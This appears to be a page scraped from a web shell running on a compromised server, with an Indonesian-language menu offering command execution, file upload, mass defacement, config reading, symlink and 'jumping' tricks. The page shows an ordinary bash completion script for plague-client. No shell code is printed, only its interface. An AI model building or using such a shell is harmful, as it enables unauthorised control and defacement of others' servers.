OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /libx32/../share/snapd/../locale/../bash-completion/completions/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
# bash completion for plague-client -*- shell-script -*- _plague_client() { local cur prev words cword _init_completion || return [[ $cword -eq 1 ]] && \ COMPREPLY=( $(compgen -W 'build detail finish help is_paused kill list list_builders pause requeue unpause update_builders' -- "$cur") ) } && complete -F _plague_client plague-client # ex: filetype=sh